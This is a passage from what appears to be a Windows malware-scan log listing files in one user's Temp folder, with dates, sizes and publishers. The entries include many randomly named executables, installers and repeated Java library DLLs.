08:01 - 000258560 _____ () C:\Users\BOB\AppData\Local\Temp\dwgenpqsvz.exe 2017-09-03 06:48 - 2017-09-03 06:48 - 000458689 _____ () C:\Users\BOB\AppData\Local\Temp\dwxxdpgnvg.exe 2017-10-11 12:47 - 2017-10-11 12:47 - 047796216 _____ (Electronic Arts, Inc.) C:\Users\BOB\AppData\Local\Temp\EADC225.exe 2017-10-11 13:02 - 2017-10-11 13:02 - 047796216 _____ (Electronic Arts, Inc.) C:\Users\BOB\AppData\Local\Temp\EADC937.exe 2017-10-10 17:04 - 2017-10-10 17:04 - 047796216 _____ (Electronic Arts, Inc.) C:\Users\BOB\AppData\Local\Temp\EADDC79.exe 2017-09-02 08:53 - 2017-09-02 08:53 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\eckmwvcvce.exe 2017-05-05 19:38 - 2017-05-05 19:38 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\ed6e8e8c4b588010c8f64663407c6196.dll 2017-08-10 10:53 - 2017-08-10 10:53 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\egxjorjikb.exe 2017-08-31 14:08 - 2017-08-31 14:08 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\enaiorkdtj.exe 2017-08-31 13:24 - 2017-08-31 13:24 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\enndbulary.exe 2017-08-09 17:18 - 2017-08-09 17:18 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\eoqeirctzm.exe 2017-08-31 16:11 - 2017-08-31 16:11 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\ertljudqqa.exe 2017-08-10 10:53 - 2017-08-10 10:53 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\esawrvqkxo.exe 2017-08-09 16:35 - 2017-08-09 16:35 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\esbeyihxji.exe 2017-09-06 13:18 - 2017-09-06 13:18 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\euswplvkeq.exe 2017-08-30 17:07 - 2017-08-30 17:07 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\evkfwgcqem.exe 2017-09-01 12:46 - 2017-09-01 12:46 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\ewagxpzgdn.exe 2017-09-04 15:36 - 2017-09-04 15:36 - 000686080 _____ () C:\Users\BOB\AppData\Local\Temp\F1EC.tmp.exe 2017-09-08 16:58 - 2017-09-08 16:58 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\feiernrhpz.exe 2017-08-30 08:52 - 2017-09-08 16:58 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\fejwlzbyel.exe 2017-08-31 10:28 - 2017-08-31 10:28 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\fjpciaobei.exe 2017-09-05 15:57 - 2017-09-05 15:57 - 000000021 _____ () C:\Users\BOB\AppData\Local\Temp\fpqsquodpy.exe 2017-08-31 10:28 - 2017-08-31 10:28 - 000484071 _____ () C:\Users\BOB\AppData\Local\Temp\fqojooekpw.exe 2017-09-13 12:44 - 2017-09-13 12:44 - 000000021 _____ () C:\Users\BOB\AppData\Local\Temp\ftoidjlwgv.exe 2017-09-02 08:53 - 2017-09-02 08:53 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\fvwuqnxyde.exe 2017-08-09 16:35 - 2017-08-09 16:35 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\fzsmevxocp.exe 2017-08-10 08:42 - 2017-08-10 08:42 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\ggfovfxzza.exe 2017-08-10 12:46 - 2017-08-10 12:46 - 000120320 _____ () C:\Users\BOB\AppData\Local\Temp\gkdxsoxjzr.exe 2016-09-05 19:38 - 2016-09-05 19:38 - 000763232 _____ (Google Inc.) C:\Users\BOB\AppData\Local\Temp\GoogleUpdateSetup_latest.exe 2017-04-09 18:12 - 2016-04-26 14:37 - 000246808 _____ (BlueStack Systems) C:\Users\BOB\AppData\Local\Temp\HD-Logger-Native.dll 2017-04-09 18:12 - 2016-04-26 14:39 - 000128536 _____ (BlueStack Systems) C:\Users\BOB\AppData\Local\Temp\HD-ShortcutHandler.dll 2017-08-10 10:53 - 2017-08-10 10:53 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\hjrcpeosqc.exe 2017-08-30 09:59 - 2017-08-30 09:59 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\hryunzmgyj.exe 2017-08-30 09:59 - 2017-08-30 09:59 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\hukhqdlikw.exe 2017-05-20 10:01 - 2017-05-20 10:42 - 000700992 _____ (Bot Productions) C:\Users\BOB\AppData\Local\Temp\icons.exe 2017-03-02 07:48 - 2017-03-02 07:48 - 001677234 _____ ( ) C:\Users\BOB\AppData\Local\Temp\ICReinstall_13132910793662840750.exe 2017-04-25 19:18 - 2017-04-25 19:18 - 001263688 _____ ( ) C:\Users\BOB\AppData\Local\Temp\ICReinstall_Chocapic13.exe 2017-03-12 08:31 - 2017-03-12 08:31 - 001263507 _____ (AdworldInternet) C:\Users\BOB\AppData\Local\Temp\ICReinstall_Grand_Theft_Auto_IV_GTA_4__2418151936.exe 2017-08-31 16:11 - 2017-08-31 16:11 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\ientuwiykj.exe 2017-09-03 06:49 - 2017-09-03 06:49 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\ieyqobgqdw.exe 2017-09-11 15:51 - 2017-09-11 15:51 - 000000021 _____ () C:\Users\BOB\AppData\Local\Temp\ihrzfxiwmd.exe 2017-08-10 08:44 - 2017-08-10 08:44 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\iioeunkwpd.exe 2017-08-10 11:45 - 2017-08-10 11:45 - 001153536 _____ () C:\Users\BOB\AppData\Local\Temp\izgswmbvtm.exe 2017-06-17 10:06 - 2017-06-17 10:06 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1029765156500719525.dll 2017-05-25 18:10 - 2017-05-25 18:10 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1054697095920955469.dll 2017-11-20 17:24 - 2017-11-20 17:24 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1058382375931620392.dll 2017-04-20 14:01 - 2017-04-20 14:01 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1168316316851491296.dll 2017-05-17 15:29 - 2017-05-17 15:29 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1185856316341021143.dll 2017-05-26 10:57 - 2017-05-26 10:57 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1242662772498585591.dll 2017-06-14 13:29 - 2017-06-14 13:29 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1360893804398268848.dll 2017-05-25 14:55 - 2017-05-25 14:55 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1416129541956119047.dll 2017-12-02 10:11 - 2017-12-02 10:11 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1593574731582162917.dll 2017-06-22 11:46 - 2017-06-22 11:46 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1598035106030119220.dll 2017-05-01 08:44 - 2017-05-01 08:44 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1761317428482608631.dll 2017-05-28 17:32 - 2017-05-28 17:32 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-180031009648188668.dll 2017-05-26 13:09 - 2017-05-26 13:09 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1803452013008491061.dll 2017-05-25 14:53 - 2017-05-25 14:53 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1834169305683994511.dll 2017-11-20 17:20 - 2017-11-20 17:20 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1836154342295491655.dll 2017-05-15 20:18 - 2017-05-15 20:18 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1858969135179508939.dll 2017-06-13 17:54 - 2017-06-13 17:54 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1901353997004446716.dll 2017-05-30 19:20 - 2017-05-30 19:20 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-1906283187820309788.dll 2017-08-08 10:25 - 2017-08-08 10:25 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2102830097843571755.dll 2017-05-26 11:03 - 2017-05-26 11:03 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2108999983640689912.dll 2017-06-17 09:07 - 2017-06-17 09:07 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2130058104271922572.dll 2017-11-30 17:36 - 2017-11-30 17:36 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2134083884415655863.dll 2017-05-25 14:54 - 2017-05-25 14:54 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2228099385815521204.dll 2017-06-26 19:17 - 2017-06-26 19:17 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2244637200803929784.dll 2017-06-01 07:06 - 2017-06-01 07:06 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2253649540002656556.dll 2017-05-25 19:10 - 2017-05-25 19:10 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2339613648984862041.dll 2017-05-27 20:32 - 2017-05-27 20:32 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-237581883151482782.dll 2017-11-28 20:04 - 2017-11-28 20:04 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2477449350601964170.dll 2017-05-25 19:04 - 2017-05-25 19:04 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2533675447600185533.dll 2017-05-25 14:51 - 2017-05-25 14:51 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2665110873748529689.dll 2017-11-30 17:33 - 2017-11-30 17:33 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2714526923064295020.dll 2017-11-25 13:08 - 2017-11-25 13:08 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-2770046404426939124.dll 2017-04-20 12:42 - 2017-04-20 12:42 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3034727455414005238.dll 2017-12-18 17:24 - 2017-12-18 17:24 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3075242131858600341.dll 2017-11-20 20:10 - 2017-11-20 20:10 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3089541896696760224.dll 2017-05-26 06:17 - 2017-05-26 06:17 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3100597728220764222.dll 2017-05-27 14:33 - 2017-05-27 14:33 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3104693356443622719.dll 2017-05-31 19:26 - 2017-05-31 19:26 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3136751984095936806.dll 2017-06-18 12:11 - 2017-06-18 12:11 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3204380596585123641.dll 2017-06-07 17:24 - 2017-06-07 17:24 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3240450092841960643.dll 2017-05-23 21:31 - 2017-05-23 21:31 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3290197524193639939.dll 2017-11-30 17:39 - 2017-11-30 17:39 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-349143464494832494.dll 2017-05-23 21:26 - 2017-05-23 21:26 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3506010959703208832.dll 2017-06-03 19:56 - 2017-06-03 19:56 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3546304471819025201.dll 2017-11-20 17:09 - 2017-11-20 17:09 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3628127104087858428.dll 2017-12-01 18:22 - 2017-12-01 18:22 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-373468532174905738.dll 2017-11-20 20:05 - 2017-11-20 20:05 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3766584039916395646.dll 2017-05-01 08:42 - 2017-05-01 08:42 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-3911540493019350912.dll 2017-11-21 20:05 - 2017-11-21 20:05 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-415493522624569523.dll 2017-09-04 20:19 - 2017-09-04 20:19 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4172473195627046240.dll 2017-11-26 09:00 - 2017-11-26 09:00 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4216849207798249080.dll 2017-05-29 19:05 - 2017-05-29 19:05 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4250495718282927792.dll 2017-05-27 14:56 - 2017-05-27 14:56 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4256399944197681703.dll 2017-06-15 07:10 - 2017-06-15 07:10 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4269372135564272496.dll 2017-05-31 18:09 - 2017-05-31 18:09 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4342100284258790270.dll 2017-05-27 16:49 - 2017-05-27 16:49 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4497022926682044786.dll 2017-05-26 11:29 - 2017-05-26 11:29 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4526242944641032686.dll 2017-11-28 18:11 - 2017-11-28 18:11 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4650523816537434496.dll 2017-05-01 08:34 - 2017-05-01 08:34 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4666882240111594823.dll 2017-06-03 14:12 - 2017-06-03 14:12 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4767610709619541938.dll 2017-05-27 14:30 - 2017-05-27 14:30 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-477272588341073780.dll 2017-06-13 18:28 - 2017-06-13 18:28 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4796531142676897201.dll 2017-05-27 21:49 - 2017-05-27 21:49 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4807874822184302645.dll 2017-11-30 16:56 - 2017-11-30 16:56 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-487056250289663410.dll 2017-05-29 19:00 - 2017-05-29 19:00 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4905362673411727416.dll 2017-05-23 21:26 - 2017-05-23 21:26 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-4929038265696578251.dll 2017-06-18 13:04 - 2017-06-18 13:04 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5195894418259484663.dll 2017-05-01 08:28 - 2017-05-01 08:28 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5207994401794460265.dll 2017-05-26 10:56 - 2017-05-26 10:56 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5450128694115313913.dll 2017-06-17 09:36 - 2017-06-17 09:36 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5473941588405402555.dll 2017-06-15 18:02 - 2017-06-15 18:02 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5572547554810823158.dll 2017-05-15 20:18 - 2017-05-15 20:18 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-561873273496753889.dll 2017-06-19 20:44 - 2017-06-19 20:44 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5836146825706063165.dll 2017-08-08 14:10 - 2017-08-08 14:10 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-5934531617278323506.dll 2017-05-27 14:57 - 2017-05-27 14:57 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6075979704577312659.dll 2017-04-20 13:25 - 2017-04-20 13:25 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6090101646028447748.dll 2017-06-14 13:25 - 2017-06-14 13:25 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6378919159338467613.dll 2017-05-25 14:14 - 2017-05-25 14:14 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6494439750296794222.dll 2017-06-17 18:10 - 2017-06-17 18:10 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6513749921249042998.dll 2017-05-25 21:53 - 2017-05-25 21:53 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6524367102509637722.dll 2017-11-28 19:07 - 2017-11-28 19:07 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-658678351096817755.dll 2017-11-20 20:02 - 2017-11-20 20:02 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6605962686574972229.dll 2017-08-08 10:29 - 2017-08-08 10:29 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6685064473786545162.dll 2017-05-26 10:53 - 2017-05-26 10:53 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-669968791019442475.dll 2017-05-28 08:52 - 2017-05-28 08:52 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6841859687581727624.dll 2017-05-28 13:41 - 2017-05-28 13:41 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-685375786937817449.dll 2017-12-18 19:08 - 2017-12-18 19:08 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6892798502335677459.dll 2017-05-25 14:12 - 2017-05-25 14:12 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-690341021862554965.dll 2017-05-28 16:14 - 2017-05-28 16:14 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6915799586927703184.dll 2017-12-18 18:56 - 2017-12-18 18:56 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6941871216331938992.dll 2017-06-13 18:11 - 2017-06-13 18:11 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-6965698002446829173.dll 2017-08-07 18:47 - 2017-08-07 18:47 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7031694678888256971.dll 2017-12-02 11:04 - 2017-12-02 11:04 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7046688852456236578.dll 2017-06-17 09:51 - 2017-06-17 09:51 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7103125227431696469.dll 2017-12-01 18:31 - 2017-12-01 18:31 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7109465426702139231.dll 2017-06-28 13:00 - 2017-06-28 13:00 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7149862539191742400.dll 2017-06-08 18:08 - 2017-06-08 18:08 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7169035623175328684.dll 2017-05-30 19:39 - 2017-05-30 19:39 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7198258960948980777.dll 2017-05-26 11:42 - 2017-05-26 11:42 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7230761984767387693.dll 2017-06-15 16:13 - 2017-06-15 16:13 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7231099005166409596.dll 2017-12-18 18:46 - 2017-12-18 18:46 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7247692834629066252.dll 2017-11-21 20:27 - 2017-11-21 20:27 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7275896091032781454.dll 2017-06-17 09:47 - 2017-06-17 09:47 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7458550415624180281.dll 2017-05-26 13:11 - 2017-05-26 13:11 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7611839711114879266.dll 2017-05-15 20:19 - 2017-05-15 20:19 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7639060649074162634.dll 2017-08-08 09:56 - 2017-08-08 09:56 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7863321787368739815.dll 2017-05-27 18:20 - 2017-05-27 18:20 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7917131775355761872.dll 2017-11-28 20:13 - 2017-11-28 20:13 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-7946551882835068011.dll 2017-05-25 11:31 - 2017-05-25 11:31 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8319163303989470823.dll 2017-05-27 22:06 - 2017-05-27 22:06 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-839348282966354920.dll 2017-05-27 14:58 - 2017-05-27 14:58 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8400897342887733878.dll 2017-12-18 19:15 - 2017-12-18 19:15 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8421726126298587576.dll 2017-05-26 10:50 - 2017-05-26 10:50 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8430542767203387798.dll 2017-05-26 11:20 - 2017-05-26 11:20 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8451016147568746350.dll 2017-05-25 15:07 - 2017-05-25 15:07 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8522799228971613077.dll 2017-06-13 18:01 - 2017-06-13 18:01 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8563410029842182360.dll 2017-06-13 18:04 - 2017-06-13 18:04 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8632854333908373425.dll 2017-06-13 18:33 - 2017-06-13 18:33 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8646444766211395226.dll 2017-06-17 14:52 - 2017-06-17 14:52 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8772136229449837996.dll 2017-11-20 17:11 - 2017-11-20 17:11 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8874286466311412176.dll 2017-05-01 08:49 - 2017-05-01 08:49 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8940913516536925763.dll 2017-05-26 10:59 - 2017-05-26 10:59 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8942236630810121083.dll 2017-05-26 11:18 - 2017-05-26 11:18 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-8959009772603648905.dll 2017-06-13 18:20 - 2017-06-13 18:20 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-897713686194198309.dll 2017-08-07 18:26 - 2017-08-07 18:26 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-9066687416495364226.dll 2017-12-02 10:37 - 2017-12-02 10:37 - 000019968 ____N (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-9153974392387820455.dll 2017-05-26 06:29 - 2017-05-26 06:29 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-933659102911353233.dll 2017-09-27 15:25 - 2017-09-27 15:25 - 000019968 _____ (Red Hat®, Inc.) C:\Users\BOB\AppData\Local\Temp\jansi-64-942939304202001360.dll 2017-08-30 12:39 - 2017-08-30 12:39 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\jkziapxthw.exe 2017-08-09 16:08 - 2017-08-09 16:08 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\jwvfkyogyj.exe 2017-08-29 16:24 - 2017-08-29 16:24 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\khujfuzghy.exe 2017-08-30 17:07 - 2017-08-30 17:07 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\kxuktivrvy.exe 2017-08-31 07:25 - 2017-08-31 07:25 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\kytjbfhuxm.exe 2017-09-11 15:51 - 2017-09-11 15:51 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\lbinwrexdr.exe 2017-08-31 11:34 - 2017-08-31 11:34 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\lrodybticj.exe 2017-08-09 16:08 - 2017-08-09 16:08 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\mnlkjhmorx.exe 2017-09-09 09:07 - 2017-09-09 09:07 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\navkajikco.exe 2017-08-10 12:46 - 2017-08-10 12:46 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\nbowfefpnv.exe 2017-08-31 11:34 - 2017-08-31 11:34 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\ncjovrkesi.exe 2017-08-29 19:23 - 2017-08-29 19:23 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\nimyfbpvbc.exe 2017-09-02 15:13 - 2017-09-02 15:13 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\niwblntdsc.exe 2017-08-30 17:07 - 2017-08-30 17:07 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\nlhcpnmejz.exe 2017-09-17 17:24 - 2017-09-17 17:24 - 000251392 _____ () C:\Users\BOB\AppData\Local\Temp\nllnrxhzvbr.exe 2017-09-02 15:13 - 2017-09-02 15:13 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\nmgodgetnz.exe 2017-08-10 11:45 - 2017-08-10 11:45 - 001153536 _____ () C:\Users\BOB\AppData\Local\Temp\nomwxfetxv.exe 2016-11-06 09:21 - 2016-11-06 09:21 - 000109568 _____ () C:\Users\BOB\AppData\Local\Temp\nsu6A7B.exe 2017-09-02 15:13 - 2017-09-02 15:13 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\oeloijvbfp.exe 